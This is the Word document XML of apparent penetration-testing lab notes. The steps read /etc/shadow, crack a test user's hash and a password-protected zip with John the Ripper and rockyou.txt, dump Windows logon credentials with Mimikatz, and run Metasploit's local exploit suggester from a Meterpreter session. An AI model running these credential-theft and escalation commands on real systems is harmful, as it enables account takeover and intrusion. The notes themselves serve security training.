    <w:p w14:paraId="262055C1" w14:textId="77777777" w:rsidR="001D106A" w:rsidRDefault="001D106A" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3576D106" w14:textId="1E571A4C" w:rsidR="009359C3" w:rsidRDefault="009359C3" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> test user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213DA655" w14:textId="0F9B0893" w:rsidR="009359C3" w:rsidRDefault="009359C3" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>12345678</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1CC74C" w14:textId="77777777" w:rsidR="003B23B0" w:rsidRDefault="003B23B0" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53361B36" w14:textId="798A07D4" w:rsidR="003B23B0" w:rsidRDefault="006A6C6E" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="003B23B0">
        <w:t>xit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AA7967" w14:textId="3EE3EB21" w:rsidR="006A6C6E" w:rsidRDefault="005E45F2" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="006A6C6E">
        <w:t>d /etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD5D016" w14:textId="0BB312FA" w:rsidR="006A6C6E" w:rsidRDefault="005E45F2" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006A6C6E">
        <w:t>udo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A6C6E">
        <w:t xml:space="preserve"> cat shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A0006D" w14:textId="21A29417" w:rsidR="006D432B" w:rsidRDefault="006D432B" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In desktop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33218EA7" w14:textId="40F4E996" w:rsidR="006D432B" w:rsidRDefault="006D432B" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
      <w:r w:rsidR="002C085C">
        <w:t xml:space="preserve">Hash.txt file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE8F73" w14:textId="020D6609" w:rsidR="002C085C" w:rsidRDefault="002C085C" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Copy </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>paste</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> last line of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>testuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from shadow to Hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224047A5" w14:textId="1829A437" w:rsidR="002C085C" w:rsidRDefault="00BE1AB6" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>Cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2014CD60" w14:textId="39BD9318" w:rsidR="00BE1AB6" w:rsidRDefault="00BE1AB6" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1DFD10" w14:textId="47F481F7" w:rsidR="00BE1AB6" w:rsidRDefault="00BE1AB6" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE1AB6">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE1AB6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE1AB6">
        <w:t>gunzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE1AB6">
        <w:t xml:space="preserve"> rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B71408" w14:textId="77777777" w:rsidR="00BE1AB6" w:rsidRDefault="00BE1AB6" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDD13F0" w14:textId="232158AD" w:rsidR="00650655" w:rsidRDefault="00650655" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>cd to desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13180B03" w14:textId="77777777" w:rsidR="00650655" w:rsidRDefault="00650655" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5622769F" w14:textId="4127A69E" w:rsidR="00650655" w:rsidRDefault="00650655" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00650655">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00650655">
        <w:t xml:space="preserve"> john -format=crypt --wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00650655">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00650655">
        <w:t>/share/wordlists/rockyou.txt hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDD8DC8" w14:textId="77777777" w:rsidR="00650655" w:rsidRDefault="00650655" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D8FBFD" w14:textId="113EBE17" w:rsidR="00650655" w:rsidRDefault="00650655" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">your password </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cracked and displayed here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DFD035" w14:textId="77777777" w:rsidR="00650655" w:rsidRDefault="00650655" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14018801" w14:textId="23BDCB07" w:rsidR="006D432B" w:rsidRDefault="007D6822" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671CAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Unzip a file that is password protected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E87C070" w14:textId="77777777" w:rsidR="00671CAF" w:rsidRDefault="00671CAF" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A91BA5F" w14:textId="5636C63E" w:rsidR="00671CAF" w:rsidRDefault="00CF5D96" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nano secrete.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E0869A" w14:textId="2BD0C293" w:rsidR="00CF5D96" w:rsidRDefault="00CF5D96" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is an important message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74234C01" w14:textId="77777777" w:rsidR="00D66E4A" w:rsidRDefault="00D66E4A" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C3684B" w14:textId="23C37A1F" w:rsidR="00CF5D96" w:rsidRDefault="00D66E4A" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zip the file with following command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49580D31" w14:textId="560477D7" w:rsidR="00CF5D96" w:rsidRDefault="00D66E4A" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D66E4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zip -e secret.zip secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BC84BD" w14:textId="77777777" w:rsidR="00D66E4A" w:rsidRDefault="00D66E4A" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366AB0C8" w14:textId="15240D9D" w:rsidR="00D66E4A" w:rsidRDefault="00D66E4A" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rm secrete.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E978F8" w14:textId="77777777" w:rsidR="00D66E4A" w:rsidRPr="00671CAF" w:rsidRDefault="00D66E4A" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39FB7134" w14:textId="77777777" w:rsidR="00371DEB" w:rsidRDefault="00371DEB" w:rsidP="00371DEB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>create hash of the zipped file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A1D87F" w14:textId="77777777" w:rsidR="00371DEB" w:rsidRDefault="00371DEB" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2565ABB7" w14:textId="1CBC15ED" w:rsidR="007D6822" w:rsidRDefault="00371DEB" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r w:rsidRPr="00371DEB">
        <w:t xml:space="preserve">zip2john secret.zip &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00371DEB">
        <w:t>zip.hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17717E3D" w14:textId="77777777" w:rsidR="00371DEB" w:rsidRDefault="00371DEB" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF23D58" w14:textId="77777777" w:rsidR="007D6822" w:rsidRDefault="007D6822" w:rsidP="00A379A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A7035C0" w14:textId="3ACA35EA" w:rsidR="00084AE4" w:rsidRDefault="008E3630" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>nano password.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C897238" w14:textId="77777777" w:rsidR="008E3630" w:rsidRDefault="008E3630" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>enter passwords including password of the zipped file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D410920" w14:textId="77777777" w:rsidR="008E3630" w:rsidRDefault="008E3630" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463CDC1E" w14:textId="77777777" w:rsidR="008E3630" w:rsidRDefault="008E3630" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>test@1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036CB84E" w14:textId="77777777" w:rsidR="008E3630" w:rsidRDefault="008E3630" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>test1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D79D24" w14:textId="77777777" w:rsidR="008E3630" w:rsidRDefault="008E3630" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>admin1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257CA471" w14:textId="77777777" w:rsidR="008E3630" w:rsidRDefault="008E3630" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>root12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63466D8A" w14:textId="77777777" w:rsidR="008E3630" w:rsidRDefault="008E3630" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>12345678</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF65056" w14:textId="77777777" w:rsidR="002A5F05" w:rsidRDefault="002A5F05" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A7E632B" w14:textId="77777777" w:rsidR="002A5F05" w:rsidRDefault="002A5F05" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>And save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F93F6C0" w14:textId="77777777" w:rsidR="002A5F05" w:rsidRDefault="002A5F05" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68AD8E20" w14:textId="697CF01A" w:rsidR="00E04FDF" w:rsidRDefault="00E04FDF" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:r>
        <w:t>Extract the password using below command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356CEA18" w14:textId="77777777" w:rsidR="00F44295" w:rsidRDefault="00F44295" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE4C4C6" w14:textId="29A98DB1" w:rsidR="00E04FDF" w:rsidRDefault="00E04FDF" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E04FDF">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E04FDF">
        <w:t xml:space="preserve"> john --wordlist=passwords.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E04FDF">
        <w:t>zip.hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E04FDF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7A1E21" w14:textId="77777777" w:rsidR="00D631EC" w:rsidRDefault="00D631EC" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C8CF87E" w14:textId="77777777" w:rsidR="00D631EC" w:rsidRDefault="00D631EC" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF33882" w14:textId="77777777" w:rsidR="00E04FDF" w:rsidRDefault="00E04FDF" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140C72DB" w14:textId="60F2F603" w:rsidR="008E3630" w:rsidRDefault="008E3630" w:rsidP="00E04FDF">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB0E89" w14:textId="77777777" w:rsidR="008E3630" w:rsidRDefault="008E3630" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101BA42E" w14:textId="77777777" w:rsidR="008E3630" w:rsidRPr="00481CA6" w:rsidRDefault="008E3630" w:rsidP="00AB51B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="885"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="044D7722" w14:textId="77777777" w:rsidR="006D621F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Goal:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Understand the relationship between /etc/passwd and /etc/shadow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE00362" w14:textId="77777777" w:rsidR="006D621F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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEE8AA2" w14:textId="77777777" w:rsidR="006D621F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Extract files:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Get a copy of the target's passwd and shadow files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5049665B" w14:textId="77777777" w:rsidR="006D621F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Unshadow:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run unshadow passwd shadow &gt; combined.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE8947D" w14:textId="77777777" w:rsidR="006D621F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Crack:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run john --wordlist=/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usr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/share/wordlists/rockyou.txt combined.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37955AAC" w14:textId="77777777" w:rsidR="006D621F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Check:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> View cracked passwords with john --show combined.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C45B76" w14:textId="77777777" w:rsidR="006D621F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Lab 2: Windows Post-Exploitation with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans" w:cs="Google Sans"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42F5BC0C" w14:textId="77777777" w:rsidR="006D621F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Goal:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Extract cleartext passwords from Windows memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683BEDB3" w14:textId="77777777" w:rsidR="006D621F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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1AE7F5" w14:textId="77777777" w:rsidR="006D621F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Execution:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run mimikatz.exe with Administrator privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49418C7A" w14:textId="77777777" w:rsidR="006D621F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Debug:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Type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privilege::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debug (Ensures you have the rights to interact with processes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B7026D" w14:textId="77777777" w:rsidR="006D621F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Dump:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Type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sekurlsa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::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t>logonpasswords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71E51531" w14:textId="77777777" w:rsidR="006D621F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Analysis:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Locate the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wdigest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or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msv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sections to find stored credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6AF3E8" w14:textId="77777777" w:rsidR="006D621F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Lab 3: Privilege Escalation via Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1BF5E8" w14:textId="77777777" w:rsidR="006D621F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Goal:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Automate the search for local vulnerabilities to gain SYSTEM rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B58B0B" w14:textId="77777777" w:rsidR="006D621F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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA3DC98" w14:textId="77777777" w:rsidR="006D621F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Shell:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Establish a standard user Meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25528485" w14:textId="77777777" w:rsidR="006D621F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Background:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> Type background to return to the MSF prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B2AFDD" w14:textId="77777777" w:rsidR="006D621F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Suggest:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> use post/multi/recon/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local_exploit_suggester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711B16B" w14:textId="77777777" w:rsidR="006D621F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Configure:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
          <w:color w:val="1F1F1F"/>
        </w:rPr>
        <w:t xml:space="preserve"> set SESSION [ID] then run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCFFA36" w14:textId="77777777" w:rsidR="006D621F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Exploit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text" w:cs="Google Sans Text"/>
